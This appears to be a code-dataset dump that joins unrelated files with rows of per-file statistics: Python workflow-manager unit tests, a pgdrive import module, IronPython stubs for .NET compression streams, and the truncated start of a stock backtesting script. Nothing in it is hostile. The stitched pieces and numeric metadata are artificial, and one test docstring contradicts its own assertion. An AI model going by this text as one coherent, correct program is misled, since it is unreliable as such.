def test_workflow_walking_through_successful_flow_two_nodes():
'''
Given:
task 1 -> success -> task 2
task 1 -> failure -> task 3
task 2 -> failure -> task 3
When:
task 1 succeeds
task 2 succeeds
Then workflow is:
task 1 -> task 2
'''
task_one = example_task.SuccessTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.FailureTask('task 3')
task_one.on_success(task_two)
task_one.on_failure(task_three)
task_two.on_failure(task_three)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 2', 'parameters': (
['param', 'from', 'task', 'task 1',
'to', 'next', 'task'],)}
]
def test_workflow_walking_through_failure_flow_two_nodes_second_fail():
'''
Given:
task 1 -> success -> task 2
task 1 -> failure -> task 4
task 2 -> success -> task 3
task 2 -> failure -> task 4
When:
task 1 succeeds
task 2 fails
Then workflow is:
task 1 -> task 2 -> task 4
'''
task_one = example_task.SuccessTask('task 1')
task_two = example_task.FailureTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.FailureTask('task 4')
task_one.on_success(task_two)
task_one.on_failure(task_four)
task_two.on_success(task_three)
task_two.on_failure(task_four)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 2', 'parameters': (
['param', 'from', 'task',
'task 1', 'to', 'next', 'task'],)},
{'name': 'task 4', 'parameters': ([
'failure message from ', 'task 2'],)}
]
def test_workflow_walking_through_failure_flow_two_nodes_first_fail():
'''
Given:
task 1 -> success -> task 2
task 1 -> failure -> task 4
task 2 -> success -> task 3
task 2 -> failure -> task 4
When:
task 1 fails
Then workflow is:
task 1 -> task 4
'''
task_one = example_task.FailureTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.SuccessTask('task 4')
task_one.on_success(task_two)
task_one.on_failure(task_four)
task_two.on_success(task_three)
task_two.on_failure(task_four)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
print(manager.show_executed_flow())
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 4', 'parameters': ([
'failure message from ', 'task 1'],)}
]
def test_workflow_walking_through_successful_flow_list():
'''
Given:
task 1 -> success -> task 2, task 3
task 1 -> failure -> task 4
task 2 -> success -> task 5
task 2 -> failure -> task 6
task 3 -> success -> task 5
task 3 -> failure -> task 6
task 4 -> failure -> task 6
task 4 -> success -> task 6
When:
test 1 succeeds
test 2 succeeds
test 3 succeeds
test 5 succeeds
Then workflow is:
task 1 -> task 2 -> task 5 -> task 3 -> task 5
'''
task_one = example_task.SuccessTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.SuccessTask('task 4')
task_five = example_task.SuccessTask('task 5')
task_six = example_task.SuccessTask('task 6')
task_one.on_success(task_two, task_three)
task_one.on_failure(task_four)
task_two.on_success(task_five)
task_two.on_failure(task_six)
task_three.on_success(task_five)
task_three.on_failure(task_six)
task_four.on_success(task_six)
task_four.on_failure(task_six)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 2', 'parameters': (
['param', 'from', 'task',
'task 1', 'to', 'next', 'task'],)},
{'name': 'task 5', 'parameters': (
['param', 'from', 'task',
'task 2', 'to', 'next', 'task'],)},
{'name': 'task 3', 'parameters': (
['param', 'from', 'task',
'task 5', 'to', 'next', 'task'],)},
{'name': 'task 5', 'parameters': (
['param', 'from', 'task', 'task 3',
'to', 'next', 'task'],)}
]
def test_workflow_walking_through_successful_flow_list_optimized():
'''
Given:
task 1 -> success -> task 2, task 3
task 1 -> failure -> task 4
task 2 -> success -> task 3
task 2 -> failure -> task 6
When:
test 1 succeeds
test 2 succeeds
test 3 succeeds
Then workflow is:
task 1 -> task 2 -> task 3
'''
task_one = example_task.SuccessTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.SuccessTask('task 4')
task_five = example_task.SuccessTask('task 5')
task_six = example_task.SuccessTask('task 6')
task_one.on_success(task_two, task_three)
task_one.on_failure(task_four)
task_two.on_success(task_three)
task_two.on_failure(task_six)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 2', 'parameters': (
['param', 'from', 'task', 'task 1',
'to', 'next', 'task'],)},
{'name': 'task 3', 'parameters': (
['param', 'from', 'task', 'task 2',
'to', 'next', 'task'],)}
]
def test_workflow_walking_through_failure_flow_list():
'''
Given:
task 1 -> success -> task 2, task 3
task 1 -> failure -> task 4, task 6
task 2 -> success -> task 5
task 2 -> failure -> task 6
task 3 -> success -> task 5
task 3 -> failure -> task 6
task 4 -> failure -> task 6
task 4 -> success -> task 6
When:
test 1 fails
test 4 succeeds
Then workflow is:
task 1 -> task 4 -> task 6
'''
task_one = example_task.FailureTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.SuccessTask('task 4')
task_five = example_task.SuccessTask('task 5')
task_six = example_task.SuccessTask('task 6')
task_one.on_success(task_two, task_three)
task_one.on_failure(task_four, task_six)
task_two.on_success(task_five)
task_two.on_failure(task_six)
task_three.on_success(task_five)
task_three.on_failure(task_six)
task_four.on_success(task_six)
task_four.on_failure(task_six)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 4', 'parameters': (
['failure message from ', 'task 1'],)},
{'name': 'task 6', 'parameters': (
['param', 'from', 'task', 'task 4',
'to', 'next', 'task'],)}
]
def test_workflow_walking_through_failure_flow_list_different_flow():
'''
Given:
task 1 -> success -> task 2, task 3
task 1 -> failure -> task 4, task 6
task 2 -> success -> task 5
task 2 -> failure -> task 6
task 3 -> success -> task 5
task 3 -> failure -> task 6
task 4 -> failure -> task 6
task 4 -> success -> task 7
When:
test 1 fails
test 4 succeeds
Then workflow is:
task 1 -> task 4 -> task 6
'''
task_one = example_task.FailureTask('task 1')
task_two = example_task.SuccessTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.SuccessTask('task 4')
task_five = example_task.SuccessTask('task 5')
task_six = example_task.SuccessTask('task 6')
task_seven = example_task.SuccessTask('task 7')
task_one.on_success(task_two, task_three)
task_one.on_failure(task_four, task_six)
task_two.on_success(task_five)
task_two.on_failure(task_six)
task_three.on_success(task_five)
task_three.on_failure(task_six)
task_four.on_success(task_seven)
task_four.on_failure(task_six)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 4', 'parameters': (
['failure message from ', 'task 1'],)},
{'name': 'task 7', 'parameters': (
['param', 'from', 'task', 'task 4', 'to', 'next', 'task'],)},
{'name': 'task 6', 'parameters': (
['param', 'from', 'task', 'task 7', 'to', 'next', 'task'],)}
]
def test_workflow_walking_through_short_circuit_fail():
'''
Given:
task 1 -> success -> task 2, task 3
task 1 -> failure -> task 4
task 2 -> success -> task 5
task 2 -> failure -> task 6
task 3 -> success -> task 5
task 3 -> failure -> task 6
task 4 -> failure -> task 6
task 4 -> success -> task 6
When:
test 1 succeeds
test 2 fails
Then workflow is:
task 1 -> task 2 -> task 6
'''
task_one = example_task.SuccessTask('task 1')
task_two = example_task.FailureTask('task 2')
task_three = example_task.SuccessTask('task 3')
task_four = example_task.SuccessTask('task 4')
task_five = example_task.SuccessTask('task 5')
task_six = example_task.SuccessTask('task 6')
task_one.on_success(task_two, task_three)
task_one.on_failure(task_four)
task_two.on_success(task_five)
task_two.on_failure(task_six)
task_three.on_success(task_five)
task_three.on_failure(task_six)
task_four.on_success(task_six)
task_four.on_failure(task_six)
manager = Manager()
manager.register_initial_task(task_one)
manager.run()
assert manager.show_executed_flow() == [
{'name': 'task 1', 'parameters': ()},
{'name': 'task 2', 'parameters': (
['param', 'from', 'task', 'task 1', 'to', 'next', 'task'],)},
{'name': 'task 6', 'parameters': (
['failure message from ', 'task 2'],)}
]
| 28.546275
| 73
| 0.593706
| 1,619
| 12,646
| 4.384805
| 0.039531
| 0.040147
| 0.12706
| 0.150162
| 0.935766
| 0.922524
| 0.909001
| 0.895901
| 0.863079
| 0.832089
| 0
| 0.025884
| 0.266804
| 12,646
| 442
| 74
| 28.61086
| 0.739754
| 0.167958
| 0
| 0.768924
| 0
| 0
| 0.147437
| 0
| 0
| 0
| 0
| 0
| 0.051793
| 1
| 0.051793
| false
| 0
| 0.011952
| 0
| 0.063745
| 0.003984
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62551d8ab4b1f6a8bc7d14afc452ccfa57d167cd
| 112
|
py
|
Python
|
pgdrive/component/road/__init__.py
|
decisionforce/pgdrive
|
19af5d09a40a68a2a5f8b3ac8b40f109e71c26ee
|
[
"Apache-2.0"
] | 97
|
2020-12-25T06:02:17.000Z
|
2022-01-16T06:58:39.000Z
|
pgdrive/component/road/__init__.py
|
decisionforce/pgdrive
|
19af5d09a40a68a2a5f8b3ac8b40f109e71c26ee
|
[
"Apache-2.0"
] | 192
|
2020-12-25T07:58:17.000Z
|
2021-08-28T10:13:59.000Z
|
pgdrive/component/road/__init__.py
|
decisionforce/pgdrive
|
19af5d09a40a68a2a5f8b3ac8b40f109e71c26ee
|
[
"Apache-2.0"
] | 11
|
2020-12-29T11:23:44.000Z
|
2021-12-06T23:25:49.000Z
|
from pgdrive.component.road.road import Road, Route
from pgdrive.component.road.road_network import RoadNetwork
| 37.333333
| 59
| 0.857143
| 16
| 112
| 5.9375
| 0.5
| 0.231579
| 0.421053
| 0.505263
| 0.589474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080357
| 112
| 2
| 60
| 56
| 0.92233
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
6572cedff9748de5328ffa2ce408fc6b71f6176e
| 23,741
|
py
|
Python
|
release/stubs/System/IO/Compression.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs/System/IO/Compression.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
release/stubs/System/IO/Compression.py
|
YKato521/ironpython-stubs
|
b1f7c580de48528490b3ee5791b04898be95a9ae
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module System.IO.Compression calls itself Compression
# from System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
# by generator 1.145
""" NamespaceTracker represent a CLS namespace. """
# no imports
# no functions
# classes
class CompressionLevel(Enum, IComparable, IFormattable, IConvertible):
""" enum CompressionLevel, values: Fastest (1), NoCompression (2), Optimal (0) """
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): # cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): # cannot find CLR method
pass
def __gt__(self, *args): # cannot find CLR method
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): # cannot find CLR method
pass
def __lt__(self, *args): # cannot find CLR method
pass
def __ne__(self, *args): # cannot find CLR method
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
def __str__(self, *args): # cannot find CLR method
pass
Fastest = None
NoCompression = None
Optimal = None
value__ = None
class CompressionMode(Enum, IComparable, IFormattable, IConvertible):
"""
Specifies whether to compress or decompress the underlying stream.
enum CompressionMode, values: Compress (1), Decompress (0)
"""
def __eq__(self, *args): # cannot find CLR method
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self, *args): # cannot find CLR method
""" __format__(formattable: IFormattable, format: str) -> str """
pass
def __ge__(self, *args): # cannot find CLR method
pass
def __gt__(self, *args): # cannot find CLR method
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self, *args): # cannot find CLR method
pass
def __lt__(self, *args): # cannot find CLR method
pass
def __ne__(self, *args): # cannot find CLR method
pass
def __reduce_ex__(self, *args): # cannot find CLR method
pass
def __str__(self, *args): # cannot find CLR method
pass
Compress = None
Decompress = None
value__ = None
class DeflateStream(Stream, IDisposable):
"""
Provides methods and properties for compressing and decompressing streams using the Deflate algorithm.
DeflateStream(stream: Stream, mode: CompressionMode)
DeflateStream(stream: Stream, mode: CompressionMode, leaveOpen: bool)
DeflateStream(stream: Stream, compressionLevel: CompressionLevel)
DeflateStream(stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
def BeginRead(self, array, offset, count, asyncCallback, asyncState):
"""
BeginRead(self: DeflateStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous read operation.
array: The byte array to read the data into.
offset: The byte offset in array at which to begin writing data read from the stream.
count: The maximum number of bytes to read.
asyncCallback: An optional asynchronous callback, to be called when the read is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous read request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous read, which could still be
pending.
"""
pass
def BeginWrite(self, array, offset, count, asyncCallback, asyncState):
"""
BeginWrite(self: DeflateStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous write operation.
array: The buffer to write data from.
offset: The byte offset in buffer to begin writing from.
count: The maximum number of bytes to write.
asyncCallback: An optional asynchronous callback, to be called when the write is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous write request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous write, which could still be
pending.
"""
pass
def CreateWaitHandle(self, *args): # cannot find CLR method
"""
CreateWaitHandle(self: Stream) -> WaitHandle
Allocates a System.Threading.WaitHandle object.
Returns: A reference to the allocated WaitHandle.
"""
pass
def Dispose(self):
"""
Dispose(self: DeflateStream, disposing: bool)
Releases the unmanaged resources used by the System.IO.Compression.DeflateStream and optionally
releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def EndRead(self, asyncResult):
"""
EndRead(self: DeflateStream, asyncResult: IAsyncResult) -> int
Waits for the pending asynchronous read to complete.
asyncResult: The reference to the pending asynchronous request to finish.
Returns: The number of bytes read from the stream, between zero (0) and the number of bytes you
requested. System.IO.Compression.DeflateStream returns zero (0) only at the end of the stream;
otherwise, it blocks until at least one byte is available.
"""
pass
def EndWrite(self, asyncResult):
"""
EndWrite(self: DeflateStream, asyncResult: IAsyncResult)
Ends an asynchronous write operation.
asyncResult: A reference to the outstanding asynchronous I/O request.
"""
pass
def Flush(self):
"""
Flush(self: DeflateStream)
Flushes the contents of the internal buffer of the current stream object to the underlying
stream.
"""
pass
def MemberwiseClone(self, *args): # cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def ObjectInvariant(self, *args): # cannot find CLR method
"""
ObjectInvariant(self: Stream)
Provides support for a System.Diagnostics.Contracts.Contract.
"""
pass
def Read(self, array, offset, count):
"""
Read(self: DeflateStream, array: Array[Byte], offset: int, count: int) -> int
Reads a number of decompressed bytes into the specified byte array.
array: The array to store decompressed bytes.
offset: The byte offset in array at which the read bytes will be placed.
count: The maximum number of decompressed bytes to read.
Returns: The number of bytes that were read into the byte array.
"""
pass
def Seek(self, offset, origin):
"""
Seek(self: DeflateStream, offset: Int64, origin: SeekOrigin) -> Int64
This operation is not supported and always throws a System.NotSupportedException.
offset: The location in the stream.
origin: One of the System.IO.SeekOrigin values.
Returns: A long value.
"""
pass
def SetLength(self, value):
"""
SetLength(self: DeflateStream, value: Int64)
This operation is not supported and always throws a System.NotSupportedException.
value: The length of the stream.
"""
pass
def Write(self, array, offset, count):
"""
Write(self: DeflateStream, array: Array[Byte], offset: int, count: int)
Writes compressed bytes to the underlying stream from the specified byte array.
array: The buffer that contains the data to compress.
offset: The byte offset in array at which the compressed bytes will be placed.
count: The maximum number of compressed bytes to write.
"""
pass
def __enter__(self, *args): # cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): # cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, stream, *__args):
"""
__new__(cls: type, stream: Stream, mode: CompressionMode)
__new__(cls: type, stream: Stream, mode: CompressionMode, leaveOpen: bool)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
pass
BaseStream = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a reference to the underlying stream.
Get: BaseStream(self: DeflateStream) -> Stream
"""
CanRead = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports reading while decompressing a file.
Get: CanRead(self: DeflateStream) -> bool
"""
CanSeek = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports seeking.
Get: CanSeek(self: DeflateStream) -> bool
"""
CanWrite = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports writing.
Get: CanWrite(self: DeflateStream) -> bool
"""
Length = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Length(self: DeflateStream) -> Int64
"""
Position = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Position(self: DeflateStream) -> Int64
Set: Position(self: DeflateStream) = value
"""
class GZipStream(Stream, IDisposable):
"""
Provides methods and properties used to compress and decompress streams.
GZipStream(stream: Stream, mode: CompressionMode)
GZipStream(stream: Stream, mode: CompressionMode, leaveOpen: bool)
GZipStream(stream: Stream, compressionLevel: CompressionLevel)
GZipStream(stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
def BeginRead(self, array, offset, count, asyncCallback, asyncState):
"""
BeginRead(self: GZipStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous read operation.
array: The byte array to read the data into.
offset: The byte offset in array at which to begin writing data read from the stream.
count: The maximum number of bytes to read.
asyncCallback: An optional asynchronous callback, to be called when the read is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous read request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous read, which could still be
pending.
"""
pass
def BeginWrite(self, array, offset, count, asyncCallback, asyncState):
"""
BeginWrite(self: GZipStream, array: Array[Byte], offset: int, count: int, asyncCallback: AsyncCallback, asyncState: object) -> IAsyncResult
Begins an asynchronous write operation.
array: The buffer containing data to write to the current stream.
offset: The byte offset in array at which to begin writing.
count: The maximum number of bytes to write.
asyncCallback: An optional asynchronous callback to be called when the write is complete.
asyncState: A user-provided object that distinguishes this particular asynchronous write request from other
requests.
Returns: An System.IAsyncResult object that represents the asynchronous write, which could still be
pending.
"""
pass
def CreateWaitHandle(self, *args): # cannot find CLR method
"""
CreateWaitHandle(self: Stream) -> WaitHandle
Allocates a System.Threading.WaitHandle object.
Returns: A reference to the allocated WaitHandle.
"""
pass
def Dispose(self):
"""
Dispose(self: GZipStream, disposing: bool)
Releases the unmanaged resources used by the System.IO.Compression.GZipStream and optionally
releases the managed resources.
disposing: true to release both managed and unmanaged resources; false to release only unmanaged resources.
"""
pass
def EndRead(self, asyncResult):
"""
EndRead(self: GZipStream, asyncResult: IAsyncResult) -> int
Waits for the pending asynchronous read to complete.
asyncResult: The reference to the pending asynchronous request to finish.
Returns: The number of bytes read from the stream, between zero (0) and the number of bytes you
requested. System.IO.Compression.GZipStream returns zero (0) only at the end of the stream;
otherwise, it blocks until at least one byte is available.
"""
pass
def EndWrite(self, asyncResult):
"""
EndWrite(self: GZipStream, asyncResult: IAsyncResult)
Handles the end of an asynchronous write operation.
asyncResult: The System.IAsyncResult object that represents the asynchronous call.
"""
pass
def Flush(self):
"""
Flush(self: GZipStream)
Flushes the contents of the internal buffer of the current System.IO.Compression.GZipStream
object to the underlying stream.
"""
pass
def MemberwiseClone(self, *args): # cannot find CLR method
"""
MemberwiseClone(self: MarshalByRefObject, cloneIdentity: bool) -> MarshalByRefObject
Creates a shallow copy of the current System.MarshalByRefObject object.
cloneIdentity: false to delete the current System.MarshalByRefObject object's identity, which will cause the
object to be assigned a new identity when it is marshaled across a remoting boundary. A value of
false is usually appropriate. true to copy the current System.MarshalByRefObject object's
identity to its clone, which will cause remoting client calls to be routed to the remote server
object.
Returns: A shallow copy of the current System.MarshalByRefObject object.
MemberwiseClone(self: object) -> object
Creates a shallow copy of the current System.Object.
Returns: A shallow copy of the current System.Object.
"""
pass
def ObjectInvariant(self, *args): # cannot find CLR method
"""
ObjectInvariant(self: Stream)
Provides support for a System.Diagnostics.Contracts.Contract.
"""
pass
def Read(self, array, offset, count):
"""
Read(self: GZipStream, array: Array[Byte], offset: int, count: int) -> int
Reads a number of decompressed bytes into the specified byte array.
array: The array used to store decompressed bytes.
offset: The byte offset in array at which the read bytes will be placed.
count: The maximum number of decompressed bytes to read.
Returns: The number of bytes that were decompressed into the byte array. If the end of the stream has
been reached, zero or the number of bytes read is returned.
"""
pass
def Seek(self, offset, origin):
"""
Seek(self: GZipStream, offset: Int64, origin: SeekOrigin) -> Int64
This property is not supported and always throws a System.NotSupportedException.
offset: The location in the stream.
origin: One of the System.IO.SeekOrigin values.
Returns: A long value.
"""
pass
def SetLength(self, value):
"""
SetLength(self: GZipStream, value: Int64)
This property is not supported and always throws a System.NotSupportedException.
value: The length of the stream.
"""
pass
def Write(self, array, offset, count):
"""
Write(self: GZipStream, array: Array[Byte], offset: int, count: int)
Writes compressed bytes to the underlying stream from the specified byte array.
array: The buffer that contains the data to compress.
offset: The byte offset in array at which the compressed bytes will be placed.
count: The maximum number of compressed bytes to write.
"""
pass
def __enter__(self, *args): # cannot find CLR method
"""
__enter__(self: IDisposable) -> object
Provides the implementation of __enter__ for objects which implement IDisposable.
"""
pass
def __exit__(self, *args): # cannot find CLR method
"""
__exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object)
Provides the implementation of __exit__ for objects which implement IDisposable.
"""
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
@staticmethod # known case of __new__
def __new__(self, stream, *__args):
"""
__new__(cls: type, stream: Stream, mode: CompressionMode)
__new__(cls: type, stream: Stream, mode: CompressionMode, leaveOpen: bool)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel)
__new__(cls: type, stream: Stream, compressionLevel: CompressionLevel, leaveOpen: bool)
"""
pass
BaseStream = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a reference to the underlying stream.
Get: BaseStream(self: GZipStream) -> Stream
"""
CanRead = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports reading while decompressing a file.
Get: CanRead(self: GZipStream) -> bool
"""
CanSeek = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports seeking.
Get: CanSeek(self: GZipStream) -> bool
"""
CanWrite = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Gets a value indicating whether the stream supports writing.
Get: CanWrite(self: GZipStream) -> bool
"""
Length = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Length(self: GZipStream) -> Int64
"""
Position = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""This property is not supported and always throws a System.NotSupportedException.
Get: Position(self: GZipStream) -> Int64
Set: Position(self: GZipStream) = value
"""
| 28.296782
| 221
| 0.608862
| 2,549
| 23,741
| 5.523342
| 0.110632
| 0.023865
| 0.03182
| 0.040912
| 0.89978
| 0.872931
| 0.852901
| 0.849137
| 0.844165
| 0.840898
| 0
| 0.003085
| 0.317299
| 23,741
| 838
| 222
| 28.330549
| 0.86556
| 0.595257
| 0
| 0.866242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.343949
| false
| 0.343949
| 0
| 0
| 0.490446
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
65787b68a0b5e1c3c626ba7fd5823a96f53459eb
| 38,990
|
py
|
Python
|
CSZL_Framework2022/CSZLDisplay.py
|
BNDKG/CSZL_2022
|
2cf55ccff21d54474fa9b55f21b5c204a35e5263
|
[
"MIT"
] | null | null | null |
CSZL_Framework2022/CSZLDisplay.py
|
BNDKG/CSZL_2022
|
2cf55ccff21d54474fa9b55f21b5c204a35e5263
|
[
"MIT"
] | null | null | null |
CSZL_Framework2022/CSZLDisplay.py
|
BNDKG/CSZL_2022
|
2cf55ccff21d54474fa9b55f21b5c204a35e5263
|
[
"MIT"
] | null | null | null |
#coding=utf-8
import pandas as pd
import numpy as np
import CSZLData
import matplotlib
import matplotlib.pyplot as plt
from sklearn.utils import shuffle
class CSZLDisplay(object):
"""description of class"""
def Topk_nextopen(self,resultpath):
#df_all = pd.read_csv('./Database/Dailydata.csv',index_col=0,header=0)
#df_adj_all=pd.read_csv('./Database/Daily_adj_factor.csv',index_col=0,header=0)
#df_limit_all=pd.read_csv('./Database/Daily_stk_limit.csv',index_col=0,header=0)
df_all = pd.read_pickle('./Database/Dailydata.pkl')
df_adj_all = pd.read_pickle('./Database/Daily_adj_factor.pkl')
df_limit_all = pd.read_pickle('./Database/Daily_stk_limit.pkl')
df_all=pd.merge(df_all, df_adj_all, how='left', on=['ts_code','trade_date'])
df_all=pd.merge(df_all, df_limit_all, how='left', on=['ts_code','trade_date'])
score_df = pd.read_csv(resultpath,index_col=0,header=0)
#score_df=score_df[['ts_code','trade_date','mix']]
score_df=score_df[['ts_code','trade_date','mix_rank','Shift_1total_mv_rank','close_show']]
#score_df = pd.read_csv('zzzzfackdatapred_fullold.csv',index_col=0,header=0)
#print(df_all)
print(score_df)
#hold_all=5
#change_num=1
hold_all=30
change_num=5
account=100000000
accountbase=account
buy_pct=0.9
Trans_cost=0.997 #千三
# balance random none
choicepolicy="none"
###添加停牌计算和涨跌停简单策略
#stop_state 当日不停牌为0,当日停牌为1 (TODO:前日停牌本日不停牌为2,不每日刷新),每日刷新
#control_state_open 当日不停牌且开盘未触及涨跌停为0,当日开盘触及跌停为1,当日开盘触及涨停为2,每日刷新
#control_state_close 当日不停牌且收盘没有触及涨跌停为0,当日收盘触及跌停1,当日收盘触及涨停为2,每日刷新
#last_action_flag 前日不需要买入卖出为0,前日需要卖出为1,前日需要买入为2
codelist=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
codelist_buffer=pd.DataFrame(columns=('ts_code','lastprice','buy_amount','last_adj_factor','last_action_flag'))
#codelist=codelist.append([{'ts_code':1,'lastprice':1,'amount':1,'adjflag':1}])
#print(codelist)
score_df=score_df.sort_values(by=['trade_date'])
datelist=score_df['trade_date'].unique()
cur_hold_num=0
print(datelist)
days=0
show3=[]
last_cur_merge_df=[]
for cur_date in datelist:
#这里注意停牌的不包含在这个list中
cur_df_all=df_all[df_all['trade_date'].isin([cur_date])]
cur_score_df=score_df[score_df['trade_date'].isin([cur_date])]
